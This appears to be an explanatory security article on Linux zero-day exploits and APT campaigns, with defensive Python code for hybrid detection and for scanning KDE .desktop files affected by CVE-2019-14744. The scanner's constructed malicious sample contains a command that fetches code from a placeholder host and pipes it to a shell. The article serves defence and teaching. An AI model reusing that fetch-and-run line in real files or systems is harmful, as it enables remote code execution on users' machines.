It was once the popular opinion that Linux was immune to zero-day exploits. However, even before the Equifax breach, vulnerabilities were found in Linux distributions like Fedora and Ubuntu. In particular, back in 2016, a security researcher showed that a Linux desktop could be compromised simply by getting it to play or index a specially crafted music file. Then, in 2017, attackers used a vulnerability in Apache Struts to break into Equifax (a flaw for which a patch had been available for months, which shows that unpatched known bugs get exploited at least as readily as true zero-days). Zero-day exploits are a favourite tool of advanced persistent threats precisely because they target vulnerabilities for which no fix yet exists. Read on to learn more about what zero-day exploits are and how they can affect a Linux system.
What Are Zero-Day Exploits?
A zero-day is a vulnerability that attackers know how to exploit before the vendor is aware of it, so no patch exists when the attacks begin. The name refers to the number of days the vendor has had to fix the flaw: zero. The danger lies in the fact that, for as long as only the attacker knows about it, the vulnerability can be exploited quietly for months or even years, or sold on the black market. Once the vendor learns of the vulnerability (day zero from its point of view), it can start developing a fix, and the window of exposure only closes once that fix is deployed on the affected systems.
How Do You Detect a Zero-Day Attack?
Understandably, zero-day attacks are very difficult to detect, because by definition there is no patch and no signature for them yet. However, a number of strategies make it easier to spot them:
- Statistics-based detection—builds a statistical baseline of normal system behavior from historical data (often with machine learning) and flags deviations from it. It can catch exploits nobody has seen before, but it is prone to false positives, so it works best as part of a hybrid solution.
- Signature-based detection—compares files and traffic against libraries of known malware signatures. It is cheap and accurate for known threats, but a true zero-day has no signature yet; machine learning can help by generating signatures for newly observed variants of existing malware.
- Behavior-based detection—watches how a program interacts with the rest of the system (the processes it spawns, the files it touches, the connections it opens) and flags actions that are malicious regardless of what the code itself looks like.
- Hybrid detection—combines the other three techniques to maximize their strengths and minimize their weaknesses.
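To make the four approaches concrete, here is a toy detection pipeline added as an example for this article (it is not code from the original page or from any vendor). It runs signature, statistical and behavioral checks over a handful of constructed process-execution events and then combines them the way a hybrid solution would. All process names, hashes and the "baseline" are made up for the example; real telemetry would come from an EDR agent or auditd.

```python
"""Toy versions of the four detection approaches, run over constructed
process-execution events (hypothetical telemetry written for this example)."""
import hashlib
from collections import Counter


def fake_hash(label):
    """Stand-in for the SHA-256 of an executable, derived from a label."""
    return hashlib.sha256(label.encode()).hexdigest()


# Constructed baseline: (parent, child) process pairs from a period of
# known-good activity, used to learn what "normal" looks like.
BASELINE_EVENTS = [
    ("systemd", "sshd"), ("sshd", "bash"), ("bash", "ls"), ("bash", "ls"),
    ("bash", "ls"), ("bash", "vim"), ("gnome-shell", "firefox"),
    ("gnome-shell", "totem"), ("bash", "git"), ("bash", "git"),
]

# Signature library: hashes of executables already known to be malicious.
KNOWN_BAD_HASHES = {fake_hash("dropper.elf")}

# Behavioural rule: media players and file indexers have no business
# spawning a shell, whatever the code that made them do it looks like.
MEDIA_PARSERS = {"totem", "tracker-extract", "nautilus", "gst-launch-1.0"}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Constructed live events to classify.
LIVE_EVENTS = [
    {"parent": "bash", "child": "ls", "hash": fake_hash("ls")},       # common, benign
    {"parent": "bash", "child": "vim", "hash": fake_hash("vim")},     # rare but benign
    {"parent": "totem", "child": "sh", "hash": fake_hash("sh")},      # player spawned a shell
    {"parent": "nautilus", "child": "updater", "hash": fake_hash("dropper.elf")},  # known malware
]


def build_baseline(events):
    """Count how often each parent/child pair occurred in the baseline period."""
    return Counter(events)


def signature_detect(event, known_bad=KNOWN_BAD_HASHES):
    """Signature-based: exact match against the library of known-bad hashes."""
    return event["hash"] in known_bad


def statistical_detect(event, baseline, min_seen=2):
    """Statistics-based: anything seen fewer than min_seen times is anomalous."""
    return baseline[(event["parent"], event["child"])] < min_seen


def behavior_detect(event):
    """Behavior-based: flag a media parser spawning a shell, regardless of hashes."""
    return event["parent"] in MEDIA_PARSERS and event["child"] in SHELLS


def hybrid_detect(event, baseline):
    """Hybrid: run all three and return the names of the detectors that fired."""
    reasons = []
    if signature_detect(event):
        reasons.append("signature")
    if statistical_detect(event, baseline):
        reasons.append("statistical")
    if behavior_detect(event):
        reasons.append("behavior")
    return reasons


def hybrid_alert(reasons):
    """Alert only if a high-confidence detector fired or two detectors agree;
    a lone statistical hit is treated as a probable false positive."""
    return "signature" in reasons or "behavior" in reasons or len(reasons) >= 2


def classify(events=LIVE_EVENTS, baseline_events=BASELINE_EVENTS):
    """Map 'parent->child' to the list of detectors that fired for it."""
    baseline = build_baseline(baseline_events)
    return {f"{e['parent']}->{e['child']}": hybrid_detect(e, baseline) for e in events}


if __name__ == "__main__":
    for pair, reasons in classify().items():
        print(f"{pair:22} {'ALERT' if hybrid_alert(reasons) else 'ok   '} {reasons}")
```

Note what each detector gets right and wrong on this input: the signature check catches only the known dropper, the statistical check catches the unknown shell spawn but also flags the rarely used editor (the false positive the text warns about), and the behavioral rule catches the media player spawning a shell even though nothing about the binary is known. The hybrid layer suppresses the statistics-only hit while keeping the other two.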
What Is an Advanced Persistent Threat Attack?
An advanced persistent threat (APT) refers to an attack campaign in which an adversary establishes an unauthorized, long-term presence on a network in order to extract sensitive data. The victims are often large organizations or government networks, and the consequences of these intrusions are severe, including:
- Theft of intellectual property
- Theft of personal identifying data
- Theft of credit card information
- Theft of credentials
- Sabotage of critical infrastructure
- Compromise of further systems through lateral movement
Executing an APT campaign requires more resources than a standard web application attack. The perpetrators are usually experienced cybercriminals with financial backing. It is not unusual for APT attacks to be carried out in the context of cyber warfare, with political motives and government funding.
Thus, APTs differ from traditional web application threats in that they:
- Are more complex
- Involve infiltrating the network and lurking on it for as long as possible
- Often target the entire network rather than one specific part of it
Attacks such as SQL injection and cross-site scripting are used to gain initial entry to the targeted network, after which the attackers use Trojans and backdoor shells to expand and establish their presence inside it.
A successful APT attack has three stages. First, the attacker infiltrates the network through web assets, network resources or authorized human users, using malicious uploads or social engineering; a simultaneous DDoS attack is sometimes launched as a distraction while the perimeter is being breached. Once in, the attackers install a backdoor shell that grants them network access and lets them execute remote operations.
The second stage involves broadening their foothold: moving laterally, climbing the organization's hierarchy by compromising staff accounts, and gathering critical information.
In the third stage, they gather the stolen information in a staging location inside the target, wait until enough data has been collected, and then exfiltrate it. Often, attackers sell the data or use it for blackmail.
Examples of Zero-Day Vulnerabilities and Exploits
Zero-Day Exploit in KDE
KDE Frameworks is a collection of libraries and software frameworks by KDE, available to any Qt-based software stack or application on multiple operating systems. It is used by several Linux distributions, including Kubuntu. In 2019 a vulnerability (CVE-2019-14744) was discovered affecting KDE Frameworks 5.60.0 and earlier, caused by the way KConfig, the library behind KDesktopFile, parsed .desktop and .directory files: an entry whose key carried the [$e] shell-expansion marker could contain $(command), and that command was executed as soon as the file was parsed, for example when a file manager merely displayed the directory containing it. No click on the file was needed. The fix in KDE Frameworks 5.61.0 removed the command-execution feature altogether.
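A practical check for this class of bug is to look for .desktop and .directory files that carry the [$e] marker together with a $(...) command substitution. The scanner below is an added example written for this article, not KDE's own parser; it reimplements just enough of the KConfig entry syntax (key, optional bracketed markers such as [de] or [$e], value) to spot the dangerous combination. The two sample files are constructed, and the URL in the malicious one is a placeholder.

```python
"""Scan .desktop / .directory files for KConfig entries of the kind abused by
CVE-2019-14744: a [$e] expansion marker on the key plus $(...) in the value.
Added example; not KDE's code. Sample file contents are constructed."""
import os
import re
import sys

# [Section] header: bracketed name, no '=' on the line.
SECTION_RE = re.compile(r'^\s*\[([^\]=]+)\]\s*$')
# Entry: key, zero or more bracketed markers ([de], [$e], [$ei]...), '=', value.
ENTRY_RE = re.compile(r'^\s*([^=\[\s][^=\[]*?)((?:\[[^\]]*\])*)\s*=\s*(.*?)\s*$')
# A marker group that enables shell expansion: [$e], [$ei], [$ie], ...
EXPAND_FLAG_RE = re.compile(r'\[\$[a-z]*e[a-z]*\]')


def find_shell_expansions(text, strict=False):
    """Return (section, key, value) for entries that would have run a command.

    With strict=True every [$e]-flagged entry is reported, even plain $VAR
    expansions, which is useful when reviewing files from untrusted sources."""
    findings = []
    section = None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        key, markers, value = m.groups()
        if EXPAND_FLAG_RE.search(markers) and (strict or '$(' in value):
            findings.append((section, key.strip(), value))
    return findings


def scan_tree(root):
    """Walk a directory and map each suspicious .desktop/.directory file to its hits."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(('.desktop', '.directory')):
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    hits = find_shell_expansions(fh.read())
                if hits:
                    results[path] = hits
    return results


# Constructed sample: the kind of file an attacker would drop in a shared folder.
MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Holiday Photos
Name[de]=Urlaubsfotos
Icon[$e]=$(curl -s http://example.invalid/x | sh)
Exec=dolphin
"""

# Constructed sample: a legitimate use of [$e] for environment-variable expansion.
BENIGN_DIRECTORY = """[Desktop Entry]
Type=Directory
Name=Music
Icon=folder-sound
Path[$e]=$HOME/Music
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path, hits)
    else:
        print("malicious:", find_shell_expansions(MALICIOUS_DESKTOP))
        print("benign:   ", find_shell_expansions(BENIGN_DIRECTORY))
```

Run it with a directory argument (for example a Downloads folder or a network share) to scan a tree. The benign sample shows why the check looks for $( rather than for [$e] alone: expanding $HOME in a path is a legitimate, widely used feature, and it was only the command-substitution form that the 5.61.0 fix removed. Scanning is a stopgap; the real remedy on an affected system is upgrading KDE Frameworks.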
Zero-Day Exploit via a FLAC File on Fedora
The FLAC exploit, published in 2016, works against Fedora 25. The victim opens a booby-trapped web page and, with only one click, a crafted FLAC file is handed to the GStreamer media framework, whose FLAC decoder bug the researcher used to pop the system calculator as a proof of concept. The same path can load whatever code the attacker wishes and run it with the victim's user privileges. Even though Linux desktops follow the principle of least privilege, an ordinary user account is enough to steal that user's data, establish persistence that survives several reboots and, combined with a separate root exploit, gain administrative rights.
Zero-Day Exploit via a Music File on Ubuntu
As its name suggests, the MP3 exploit uses a music file to lure victims. The user does not even have to play it: as soon as a folder containing the file is opened, the file manager's thumbnailer or indexer parses it, the attacker's code runs, and they gain a foothold on the system from which they can install and modify whatever they like. A video on YouTube demonstrates the attack against Ubuntu 16.04 LTS; it also applies to Fedora and other Linux distributions that ship the same media libraries.
How To Prevent Zero-Day Exploits
However difficult they are to detect, there are several techniques and commercial solutions that help prevent advanced persistent threats and zero-day attacks. Endpoint detection and response vendors in this space include:
- FireEye Endpoint Security
- Symantec Endpoint Protection
- RSA NetWitness Endpoint
- CrowdStrike Falcon Insight
- Cybereason Endpoint Detection and Response
- Cynet 360 Security Platform
A security solution targeting APTs typically includes the following features:
- Traffic monitoring. Monitoring inbound and outbound traffic is the basis for preventing perimeter breaches and the installation of backdoors. Tools such as web application firewalls (WAF) filter traffic coming into your network, weeding out attacks such as SQL injection, which are used in the first stage of an APT.
- Internal traffic monitoring. Watching internal (east-west) traffic completes the perimeter surveillance: anomalies in it can be a sign that an attacker has already gained entrance, and remote requests to a planted backdoor can be intercepted there.
- Application and domain whitelisting. One of the most common prevention techniques, useful for minimizing the available attack surface. However, since much malicious software comes disguised as legitimate programs or requests, whitelisting is not completely effective on its own.
- Access control. Insider threats are a major enabler of zero-day attacks; after all, it is easier to gain entrance to a system with some help from the inside. Limiting every account's access to the strict minimum it needs (least privilege) is therefore imperative, because it also caps what an exploit running as that account can do.
Other features to look for include threat hunting capabilities and user behavior analytics.
The last wave of attacks, such as the WannaCry outbreak in 2017, has turned cybersecurity into a race against time and against the attackers. While Linux was once believed to be "safe" from zero-day attacks, the incidents and research described above have proved otherwise. Organizations can reduce their exposure to advanced persistent threats by deploying security measures geared specifically to detecting and containing them.